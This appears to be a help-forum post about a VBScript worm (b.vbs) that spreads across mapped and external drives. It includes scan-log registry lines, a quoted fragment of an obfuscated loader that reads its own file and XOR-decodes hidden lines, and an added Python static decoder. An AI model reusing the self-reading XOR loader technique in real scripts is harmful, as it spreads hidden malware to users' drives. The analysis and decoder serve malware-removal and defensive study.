


, HKLM\SOFTWARE\WOW6432NODE\POLICIES\MICROSOFT\WINDOWS NT\SYSTEMRESTORE|DisableConfig, 1, Good: (0), Bad: (1),Replaced,
, HKLM\SOFTWARE\POLICIES\MICROSOFT\WINDOWS NT\SYSTEMRESTORE|DisableConfig, 1, Good: (0), Bad: (1),Replaced,
, HKU\S-1-5-18\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\ASSOCIATIONS|LowRiskFileTypes.

Set filesys1 = CreateObject("Scripting.FileSystemObject")
For iiiii = 16 to 17 step 1 : SUGGU = Replace(Split(QJYEK(), VbCrlf)(iiiii), "REM *?:!","") : SYGYM = SYGYM & SUGGU : Next
AAA = Replace(NetworkFix(SYGYM, 1), "", "1")
Function QJYEK() : Set F = CreateObject("Scripting.FileSystemObject") : M = F.OpenTextFile(WScript.ScriptFullName,1).ReadAll : QJYEK = M : End Function
Function NetworkFix(byval Data, byval opennp)
For i = 1 to len(Data) : a= i mod len(opennp): if a = 0 then a = len(opennp) : NetworkFix = NetworkFix & chr(asc(mid(opennp,a,1)) xor asc(mid(Data,i,1)))

MCSHIELD detected the virus, please see below. I reinfected this PC as I manually removed the virus.

After executing the file the following happens:
b.vbs is copied to each drive mapped and external.
C:\Users\Administrator\AppData\Roaming\winsc32
And also the SystemInfon folder is created on each mapped and external drive containing the b.vbs script.

ESET does not detect the virus nor does Malware. I also have the virus if you would like me to copy it. Herewith the logs as requested, including the vbs script
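
The loader fragment quoted in the post reads its own file, takes lines 16 and 17 (zero-based, split on CRLF), strips the `REM *?:!` prefix and XORs the result with a repeating key. The following is an added example, not code from the post: a static decoder that recovers the hidden stage from a copy of the script without running it. Assumptions: the function names and the sample script are constructed here, the key is the character "1" (the numeric argument `1` read as a string), and the trailing `Replace(..., "", "1")` is left out because its search string is empty on the page.

```python
"""Static decoder for the loader fragment quoted in the post (never executes the script)."""

MARKER = b"REM *?:!"            # prefix the loader strips from its payload lines
PAYLOAD_LINES = (16, 17)        # "For iiiii = 16 to 17": zero-based indexes into Split(..., vbCrLf)


def network_fix(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, the same operation as the NetworkFix loop."""
    if not key:
        raise ValueError("empty key")
    # VBScript uses 1-based i with a = i mod len(key) (0 -> len); that is key[(i - 1) % len].
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def extract_payload(script: bytes) -> bytes:
    """Join the payload lines with the REM marker removed, as the For loop does."""
    lines = script.split(b"\r\n")
    if len(lines) <= max(PAYLOAD_LINES):
        raise ValueError("script is shorter than the loader expects")
    return b"".join(lines[i].replace(MARKER, b"") for i in PAYLOAD_LINES)


def decode_script(script: bytes, key: bytes = b"1") -> bytes:
    """Recover the hidden stage from raw script bytes."""
    return network_fix(extract_payload(script), key)


def build_sample() -> bytes:
    """Constructed stand-in for b.vbs: 16 filler lines, then two encoded REM lines."""
    hidden = b"constructed sample payload, not from the post"
    enc = network_fix(hidden, b"1")
    half = len(enc) // 2
    lines = [b"' filler"] * 16 + [MARKER + enc[:half], MARKER + enc[half:]]
    return b"\r\n".join(lines)


if __name__ == "__main__":
    print(decode_script(build_sample()).decode("latin-1"))
```

To analyse a real sample, pass the bytes of the script read in binary mode to `decode_script` on an isolated analysis machine.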
